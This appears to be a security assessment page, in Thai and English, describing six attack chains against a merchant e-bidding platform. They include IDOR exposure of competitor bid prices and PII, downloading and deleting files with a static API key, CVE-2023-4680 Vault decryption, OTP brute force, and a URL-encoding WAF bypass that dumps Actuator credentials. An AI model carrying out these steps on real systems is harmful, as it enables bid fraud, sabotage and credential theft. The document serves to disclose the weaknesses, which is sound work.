แผนภาพสายโจมตี
6 รูปแบบการโจมตีครอบคลุมวงจรการประมูลทั้งหมด
ไทม์ไลน์ขอบเขตการโจมตี
KILL CHAIN ทั้งหมด — ตั้งแต่ต้นจนจบ
IDOR Price Disclosure
CVSS 9.1ดูราคาเสนอคู่แข่งผ่าน IDOR — Post-Bidding (plaintext) / During Bidding (min/max range)
Exploit IDOR in merchant-ebidding endpoints to view competitor bid prices. Post-bidding exposes exact plaintext prices; during active bidding, min/max price range is still disclosed. Requires only a valid JWT from any merchant account and a forged dataProfile.
Look up any company by TIN (tax ID) to obtain their AES-encrypted bidderId. No authorization check on the TIN parameter - any merchant can query any other merchant.
Submit the victim's bidderId with any projectId to retrieve their bid price proposal, contract days, and min/max price range. Server does not verify that the requesting merchant owns the bidderId.
Retrieve detailed bid submission info including authorized signer name and position. Uses dataProfile in request body (not header), allowing easy forgery.
Document Theft & Sabotage
CVSS 9.8ขโมยและลบเอกสารคู่แข่ง — Any Time
Chain IDOR with insecure file service to download and delete competitor documents. The upload service uses only a static API key with no JWT or user binding, allowing any file to be downloaded or deleted by anyone who knows the fileId.
Look up victim company by TIN to get their encrypted bidderId. Same as Chain 1 Step 1.
List all documents submitted by the victim for a project. Returns fileIds for every uploaded file including company registration, shareholder lists, financial statements, etc.
Download any file using only a static API key header. No JWT required, no user binding, no access control. The API key is shared across the entire system.
Delete any file by fileId. Same static API key auth as downloadFile. This is a destructive operation that removes competitor bid documents, potentially disqualifying them.
PII Disclosure
CVSS 8.6เข้าถึงข้อมูลส่วนบุคคล — Any Time
Exploit IDOR to access personally identifiable information (PII) of any bidder, including company name, address, phone number, national ID, and OTP identifiers. Combines getBidder TIN lookup with infoBidderTemplateData to extract full PII.
Look up victim company by TIN to get their encrypted bidderId. Same as Chain 1 Step 1.
Retrieve full bidder template data including company name, registered address, phone number, OTP ID, document number (national ID), and price submission status. No ownership check on bidderId.
CVE-2023-4680 Vault Transit Decrypt
CVSS 9.8ถอดรหัสราคาเสนอจาก Vault (2 ชั้น) — During Active Bidding
Exploit CVE-2023-4680 nonce reuse vulnerability in HashiCorp Vault 1.11.3 Transit engine to fully decrypt 2-layer encrypted bid prices during active bidding. Layer 1 (AES-256-ECB) key is exportable; Layer 2 (AES-256-GCM96) is broken via nonce reuse to recover keystream, enabling XOR decryption of any ciphertext.
Authenticate to Vault using an expired JWT. The Vault JWT auth backend does not validate token expiration, granting a 32-day Vault token from any previously valid JWT.
Export the Layer 1 AES-256-ECB key from Vault Transit. The key is marked as exportable, allowing any authenticated merchant to retrieve the raw key material. Key name follows pattern key1_YYYYMMDD_AM or key1_YYYYMMDD_PM based on JWT issuance time.
Intercept the double-encrypted bid price from the confirm endpoint. The submitData field contains vault:v1: prefixed ciphertext (Layer 2 wrapping Layer 1 encrypted price).
Exploit CVE-2023-4680: encrypt a zero-byte plaintext using the same nonce extracted from the target ciphertext. Vault 1.11.3 accepts user-supplied nonces, producing a keystream that can be XORed with the target ciphertext to recover plaintext.
XOR the target ciphertext with the recovered keystream to get the Layer 1 ciphertext. Then AES-256-ECB decrypt using the exported key1 to recover the plaintext JSON containing the exact bid price, contract days, and other bid details.
Blockchain & OTP Bypass
CVSS 8.1โจมตี Blockchain และ OTP — During Active Bidding
Exploit blockchain timing oracle and OTP weaknesses to determine exact bid submission times, brute-force OTP codes, and write to competitor bid records. The txId encodes nanosecond-precision timestamps, OTP has no rate limiting, and infoCallBack triggers updateSubmitStatus on competitor data.
Query any transaction ID against the blockchain to check if a bid has been submitted. The txId is a nanosecond-precision unix timestamp, revealing exact bid submission timing for any competitor.
Decode the txId from infoCallBack to extract the exact bid submission time with nanosecond precision. The txId is simply a unix nanosecond timestamp, revealing when each competitor submitted their bid.
Brute-force OTP codes with no rate limiting. Tested 30+ wrong OTP attempts with no lockout or delay. Average response time ~470ms per attempt. 4-character alphanumeric OTP is feasible to brute-force during the bidding window.
The infoCallBack endpoint has a side effect: it triggers updateSubmitStatus on the target bid data. This is a WRITE operation that can modify the submission status of a competitor's bid record.
Actuator /env Mass Credential Dump
CVSS 8.6ดึง Credential ทุก Service ผ่าน Actuator — Any Time
Bypass WAF URL filtering to access Spring Boot Actuator /env endpoints across 27 microservices, extracting DB2 credentials, Kubernetes internal IPs, ActiveMQ admin passwords, API keys, and other secrets from environment variables.
Bypass F5 ASM WAF by URL-encoding the letter 'a' in 'actuator' as %61. The WAF pattern matches the literal string 'actuator' but does not URL-decode before matching, allowing /%61ctuator/env to pass through.
Iterate across all 27 known microservice base paths to extract environment variables from each. Yields DB2 credentials (27 databases), Kubernetes pod IPs, ActiveMQ cluster admin credentials, JWT signing secrets, and internal API keys.